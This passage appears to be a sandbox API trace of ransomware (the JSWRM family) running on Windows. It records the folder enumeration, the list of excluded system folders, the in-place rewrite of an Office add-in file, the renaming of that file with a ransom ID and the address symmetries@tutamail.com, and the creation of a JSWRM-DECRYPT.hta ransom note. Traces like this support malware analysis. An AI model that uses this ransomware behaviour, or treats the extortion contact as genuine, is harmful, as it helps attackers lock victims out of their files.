lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0125.707] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0125.707] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d0a0, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.PowerBI.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0125.707] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232fc0 | out: hHeap=0x1e0000) returned 1 [0125.707] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23e110 [0125.707] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22df20 | out: hHeap=0x1e0000) returned 1 [0125.707] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0125.707] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0125.707] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x624ad43, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x624ad43, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x624ad43, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x13078, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0125.707] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2=".") returned 1 [0125.707] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="..") returned 1 [0125.707] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="...") returned 1 [0125.708] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="windows") returned -1 [0125.708] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="recovery") returned -1 [0125.708] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="perflogs") returned -1 [0125.708] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="documents and settings") returned 1 [0125.708] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.708] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="system volume information") returned -1 [0125.708] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="msocache") returned -1 [0125.708] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225108 [0125.708] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0125.708] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0125.708] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dde8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0125.708] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225108 | out: hHeap=0x1e0000) returned 1 [0125.708] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0125.708] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0125.708] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0125.708] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d698, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0125.708] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0125.708] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x2455a8 [0125.708] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e110 | out: hHeap=0x1e0000) returned 1 [0125.708] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0125.708] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0125.708] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6297232, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6297232, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6297232, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4aa8, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0125.708] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2=".") returned 1 [0125.708] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="..") returned 1 [0125.708] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="...") returned 1 [0125.708] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="windows") returned -1 [0125.708] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="recovery") returned -1 [0125.708] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="perflogs") returned -1 [0125.708] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="documents and settings") returned 1 [0125.708] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.708] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="system volume information") returned -1 [0125.708] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="msocache") returned -1 [0125.708] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224d50 [0125.708] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0125.709] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0125.709] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dba8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0125.709] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224d50 | out: hHeap=0x1e0000) returned 1 [0125.709] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224e60 [0125.709] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0125.709] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d770 [0125.709] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d770, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0125.709] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224e60 | out: hHeap=0x1e0000) returned 1 [0125.709] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x244be8 [0125.709] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2455a8 | out: hHeap=0x1e0000) returned 1 [0125.709] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d770 | out: hHeap=0x1e0000) returned 1 [0125.709] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0125.709] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x163ef7bf, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x163ef7bf, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x165b9401, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4e757, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="PowerViewRes.zh-CHS.xap", cAlternateFileName="POWERV~1.XAP")) returned 1 [0125.709] lstrcmpiW (lpString1="PowerViewRes.zh-CHS.xap", lpString2=".") returned 1 [0125.709] lstrcmpiW (lpString1="PowerViewRes.zh-CHS.xap", lpString2="..") returned 1 [0125.709] lstrcmpiW (lpString1="PowerViewRes.zh-CHS.xap", lpString2="...") returned 1 [0125.709] lstrcmpiW (lpString1="PowerViewRes.zh-CHS.xap", lpString2="windows") returned -1 [0125.709] lstrcmpiW (lpString1="PowerViewRes.zh-CHS.xap", lpString2="recovery") returned -1 [0125.709] lstrcmpiW (lpString1="PowerViewRes.zh-CHS.xap", lpString2="perflogs") returned 1 [0125.709] lstrcmpiW (lpString1="PowerViewRes.zh-CHS.xap", lpString2="documents and settings") returned 1 [0125.709] lstrcmpiW (lpString1="PowerViewRes.zh-CHS.xap", lpString2="$RECYCLE.BIN") returned 1 [0125.709] lstrcmpiW (lpString1="PowerViewRes.zh-CHS.xap", lpString2="system volume information") returned -1 [0125.709] lstrcmpiW (lpString1="PowerViewRes.zh-CHS.xap", lpString2="msocache") returned 1 [0125.709] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0125.709] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.zh-CHS.xap", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0125.709] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0125.709] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.zh-CHS.xap", cchWideChar=23, lpMultiByteStr=0x240f48, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerViewRes.zh-CHS.xap", lpUsedDefaultChar=0x0) returned 23 [0125.709] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0125.709] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0125.709] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.zh-CHS.xap", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0125.709] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0125.709] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.zh-CHS.xap", cchWideChar=23, lpMultiByteStr=0x2410d8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerViewRes.zh-CHS.xap", lpUsedDefaultChar=0x0) returned 23 [0125.709] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0125.709] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b650 [0125.710] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x244be8 | out: hHeap=0x1e0000) returned 1 [0125.710] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0125.710] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e22c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0125.710] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22bad8 [0125.710] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\zh-CHS\\PowerViewRes.zh-CHS.xap" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\zh-chs\\powerviewres.zh-chs.xap"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0125.710] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e1c0 | out: lpFileSize=0x345e1c0*=321367) returned 1 [0125.710] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0125.710] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2501e8 [0125.711] ReadFile (in: hFile=0x338, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e1cc*=0x27100, lpOverlapped=0x0) returned 1 [0125.725] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0125.725] WriteFile (in: hFile=0x338, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e1c8*=0x27100, lpOverlapped=0x0) returned 1 [0125.725] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0125.725] CloseHandle (hObject=0x338) returned 1 [0125.725] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22bbc0 [0125.725] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0125.725] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0125.725] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0125.725] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0125.725] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0125.726] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0125.726] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a390 [0125.726] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a390, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0125.726] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a390 | out: hHeap=0x1e0000) returned 1 [0125.726] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf0) returned 0x2474b8 [0125.726] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x166) returned 0x1ff448 [0125.726] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0125.726] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0125.726] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\zh-CHS\\PowerViewRes.zh-CHS.xap" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\zh-chs\\powerviewres.zh-chs.xap"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\zh-CHS\\PowerViewRes.zh-CHS.xap.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\zh-chs\\powerviewres.zh-chs.xap.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0125.727] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0125.727] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bbc0 | out: hHeap=0x1e0000) returned 1 [0125.727] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bad8 | out: hHeap=0x1e0000) returned 1 [0125.727] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0125.727] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0125.727] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x163ef7bf, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x163ef7bf, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x165b9401, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4e757, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="PowerViewRes.zh-CHS.xap", cAlternateFileName="POWERV~1.XAP")) returned 0 [0125.727] FindClose (in: hFindFile=0x231ec0 | out: hFindFile=0x231ec0) returned 1 [0125.727] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b650 | out: hHeap=0x1e0000) returned 1 [0125.727] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0125.727] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0125.727] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf47e9c8f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x164159c7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x164159c7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="zh-CHT", cAlternateFileName="")) returned 1 [0125.727] lstrcmpiW (lpString1="zh-CHT", lpString2=".") returned 1 [0125.727] lstrcmpiW (lpString1="zh-CHT", lpString2="..") returned 1 [0125.727] lstrcmpiW (lpString1="zh-CHT", lpString2="...") returned 1 [0125.727] lstrcmpiW (lpString1="zh-CHT", lpString2="windows") returned 1 [0125.727] lstrcmpiW (lpString1="zh-CHT", lpString2="recovery") returned 1 [0125.727] lstrcmpiW (lpString1="zh-CHT", lpString2="perflogs") returned 1 [0125.728] lstrcmpiW (lpString1="zh-CHT", lpString2="documents and settings") returned 1 [0125.728] lstrcmpiW (lpString1="zh-CHT", lpString2="$RECYCLE.BIN") returned 1 [0125.728] lstrcmpiW (lpString1="zh-CHT", lpString2="system volume information") returned 1 [0125.728] lstrcmpiW (lpString1="zh-CHT", lpString2="msocache") returned 1 [0125.728] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0125.728] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0125.728] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2363b0 [0125.728] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b6a0 [0125.728] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f720 [0125.728] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b6a0 | out: hHeap=0x1e0000) returned 1 [0125.728] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\zh-CHT\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\zh-cht\\jswrm-decrypt.hta")) returned 0xffffffff [0125.729] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f720 | out: hHeap=0x1e0000) returned 1 [0125.729] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0125.729] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b424, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0125.729] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0125.729] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x2501e8 [0125.729] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0125.729] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x251fb8 [0125.729] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0125.729] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b448 [0125.729] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f158 [0125.729] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b448 | out: hHeap=0x1e0000) returned 1 [0125.729] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\zh-CHT\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\zh-cht\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0125.730] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0125.730] WriteFile (in: hFile=0x314, lpBuffer=0x345b538*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b504, lpOverlapped=0x0 | out: lpBuffer=0x345b538*, lpNumberOfBytesWritten=0x345b504*=0x230c, lpOverlapped=0x0) returned 1 [0125.731] CloseHandle (hObject=0x314) returned 1 [0125.731] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f158 | out: hHeap=0x1e0000) returned 1 [0125.731] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x251fb8 | out: hHeap=0x1e0000) returned 1 [0125.732] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2363b0 | out: hHeap=0x1e0000) returned 1 [0125.732] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0125.732] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0125.732] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0125.732] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b5d8 [0125.732] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f720 [0125.732] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b5d8 | out: hHeap=0x1e0000) returned 1 [0125.732] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\zh-CHT\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\zh-cht\\jswrm-decrypt.hta")) returned 0x20 [0125.732] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f720 | out: hHeap=0x1e0000) returned 1 [0125.732] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0125.733] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bc18 [0125.733] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\zh-CHT\\*.*", lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf47e9c8f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x164159c7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4199573c, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, 